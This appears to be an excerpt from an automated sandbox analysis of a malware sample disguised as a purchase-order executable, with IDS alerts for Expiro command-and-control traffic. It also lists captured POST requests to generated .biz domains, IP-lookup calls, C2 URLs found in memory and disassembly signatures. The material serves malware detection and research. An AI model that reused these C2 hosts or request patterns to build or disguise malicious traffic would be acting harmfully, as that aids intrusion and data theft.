Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	14_2_009E7E5F
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	14_2_009E7FBC
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 4x nop then jmp 014F9731h	15_2_014F9480
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 4x nop then jmp 014F9E5Ah	15_2_014F9A30
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 4x nop then jmp 014F9E5Ah	15_2_014F9D87
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 4x nop then jmp 05CF62B5h	15_2_05CF60D8
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 4x nop then jmp 05CF6C3Fh	15_2_05CF60D8
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 4x nop then jmp 05CF18A0h	15_2_05CF15F8
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 4x nop then jmp 05CF3840h	15_2_05CF3598
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 4x nop then jmp 05CF0740h	15_2_05CF0498
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 4x nop then jmp 05CF26E0h	15_2_05CF2438
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 4x nop then jmp 05CF49A0h	15_2_05CF46F8
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	15_2_05CF51D8
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 4x nop then jmp 05CF1448h	15_2_05CF11A0
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 4x nop then jmp 05CF33E8h	15_2_05CF3140
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 4x nop then jmp 05CF02E8h	15_2_05CF0040
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 4x nop then mov esp, ebp	15_2_05CF93F0
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 4x nop then jmp 05CF4548h	15_2_05CF42A0
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 4x nop then jmp 05CF0FF0h	15_2_05CF0D48
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 4x nop then jmp 05CF2F90h	15_2_05CF2CE8
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 4x nop then jmp 05CF2152h	15_2_05CF1EA8
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 4x nop then jmp 05CF40F0h	15_2_05CF3E48
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	15_2_05CF59FB
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 4x nop then jmp 05CF3C98h	15_2_05CF39F0
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 4x nop then jmp 05CF0B98h	15_2_05CF08F0
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 4x nop then jmp 05CF2B38h	15_2_05CF2890
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	15_2_05CF581B
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 4x nop then jmp 05CF4DF8h	15_2_05CF4B50
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 4x nop then jmp 05CF1CF8h	15_2_05CF1A50

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.5:50806 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.5:54833 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.5:49705 -> 54.244.188.177:80
Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.5:49833 -> 82.112.184.197:80

Source: global traffic

HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 44.221.84.105 44.221.84.105

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.5:49705
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.5:49705
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.5:49717
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.5:49717
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.5:49711
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.5:49711
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49710 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.5:49935
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.5:49935
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.246.200.160:80 -> 192.168.2.5:49971
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.246.200.160:80 -> 192.168.2.5:49971
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.5:49942
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.5:49942

Source: global traffic	HTTP traffic detected: POST /tp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /fowvjqhq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
Source: global traffic	HTTP traffic detected: POST /pmxflidirkcbpvm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ygrk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
Source: global traffic	HTTP traffic detected: POST /ncgaeohbois HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /xmmfsweyvhue HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: POST /hvtqtjugbboqpm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /tohnhxnrpjse HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ksmybghbmbq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 830
Source: global traffic	HTTP traffic detected: POST /ywaoqfakpesqv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /uqppkasccjtxk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 830
Source: global traffic	HTTP traffic detected: POST /svftqsgvqnih HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ecjuuqdshncew HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /fgjkxxt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /dpxeblwuppuirbnx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /wjxiioeyplqiis HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /jlhpxxcq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /xyvnmtdiyfgocm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /lyroetjkhx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /dydgtoryupjgtl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /mhwavs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ho HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778

Source: unknown

HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.5:49712 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

Code function: 0_2_00454EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00454EB5

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: global traffic	DNS traffic detected: DNS query: pywolwnvd.biz
Source: global traffic	DNS traffic detected: DNS query: ssbzmoy.biz
Source: global traffic	DNS traffic detected: DNS query: cvgrf.biz
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: npukfztj.biz
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: przvgke.biz
Source: global traffic	DNS traffic detected: DNS query: zlenh.biz
Source: global traffic	DNS traffic detected: DNS query: knjghuig.biz
Source: global traffic	DNS traffic detected: DNS query: uhxqin.biz
Source: global traffic	DNS traffic detected: DNS query: anpmnmxo.biz
Source: global traffic	DNS traffic detected: DNS query: lpuegx.biz
Source: global traffic	DNS traffic detected: DNS query: vjaxhpbji.biz
Source: global traffic	DNS traffic detected: DNS query: xlfhhhm.biz
Source: global traffic	DNS traffic detected: DNS query: ifsaia.biz
Source: global traffic	DNS traffic detected: DNS query: saytjshyf.biz
Source: global traffic	DNS traffic detected: DNS query: vcddkls.biz
Source: global traffic	DNS traffic detected: DNS query: fwiwk.biz
Source: global traffic	DNS traffic detected: DNS query: tbjrpv.biz
Source: global traffic	DNS traffic detected: DNS query: deoci.biz

Source: unknown

HTTP traffic detected: POST /tp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778

Source: Grinnellia.exe, 00000016.00000002.2249712826.0000000000B18000.00000004.00000020.00020000.00000000.sdmp, Grinnellia.exe, 00000016.00000002.2250241974.0000000000B5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/
Source: alg.exe, 00000003.00000003.2124461247.00000000005DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/F
Source: Grinnellia.exe, 00000016.00000002.2250241974.0000000000B5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/M
Source: Grinnellia.exe, 00000016.00000002.2250241974.0000000000B5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/d3
Source: alg.exe, 00000003.00000003.2133063417.000000000060E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2149828169.000000000060E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2124461247.000000000060E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/pmxflidirkcbpvm
Source: alg.exe, 00000003.00000003.2133063417.000000000060E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2149828169.000000000060E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2124461247.000000000060E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/pmxflidirkcbpvm.Sy
Source: alg.exe, 00000003.00000003.2124461247.00000000005D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/pmxflidirkcbpvmtV
Source: Grinnellia.exe, 00000016.00000002.2251340435.0000000000C0F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/uqppkasccjtxk
Source: Grinnellia.exe, 00000016.00000002.2251340435.0000000000C0F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/uqppkasccjtxkC
Source: alg.exe, 00000003.00000003.2124461247.00000000005D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107:80/pmxflidirkcbpvm
Source: Grinnellia.exe, 00000016.00000002.2251340435.0000000000C0F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107:80/uqppkasccjtxk
Source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000002.2073106501.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2093209407.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, Grinnellia.exe, 00000008.00000002.2099138098.0000000000B6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/
Source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000002.2073106501.0000000000C20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/%&
Source: Grinnellia.exe, 0000000B.00000002.2126725116.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/&uX
Source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000002.2073106501.0000000000C20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/7&3
Source: Grinnellia.exe, 0000000B.00000002.2126725116.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/?uA
Source: alg.exe, 00000003.00000003.2093209407.00000000005DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/V
Source: alg.exe, 00000003.00000003.2093209407.00000000005DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/f
Source: Grinnellia.exe, 00000008.00000002.2099138098.0000000000B72000.00000004.00000020.00020000.00000000.sdmp, Grinnellia.exe, 00000008.00000002.2099585917.0000000000CD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/fowvjqhq
Source: alg.exe, 00000003.00000003.2124461247.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2093209407.00000000005DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/tp
Source: alg.exe, 00000003.00000003.2092069897.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2101091606.0000000000600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/tp$V
Source: alg.exe, 00000003.00000003.2124461247.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2093209407.00000000005DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/tpz
Source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000002.2073106501.0000000000C36000.00000004.00000020.00020000.00000000.sdmp, PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000002.2073325882.0000000000CD7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/ucqpyyl
Source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000002.2073325882.0000000000CD7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/ucqpyylY
Source: Grinnellia.exe, 0000000B.00000002.2126725116.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp, Grinnellia.exe, 0000000B.00000002.2128861465.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/ygrk
Source: Grinnellia.exe, 0000000B.00000002.2128861465.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/ygrkx
Source: alg.exe, 00000003.00000003.2093209407.00000000005DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/z
Source: Grinnellia.exe, 00000008.00000002.2099138098.0000000000B72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177:80/fowvjqhq
Source: alg.exe, 00000003.00000003.2093209407.00000000005D8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2124461247.00000000005D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177:80/tpU
Source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000002.2073106501.0000000000C36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177:80/ucqpyyl
Source: Grinnellia.exe, 0000000B.00000002.2126725116.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177:80/ygrk
Source: server01.exe, 0000000F.00000002.3330930022.000000000318E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: server01.exe, 0000000F.00000002.3330930022.000000000318E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.comd
Source: server01.exe, 0000000F.00000002.3330930022.000000000318E000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 0000000F.00000002.3330930022.000000000317C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: server01.exe, 0000000F.00000002.3330930022.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: server01.exe, 0000000F.00000002.3330930022.000000000318E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/d
Source: RegSvcs.exe, 0000000D.00000002.2139311354.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: server01.exe, 0000000F.00000002.3330930022.000000000318E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.orgd
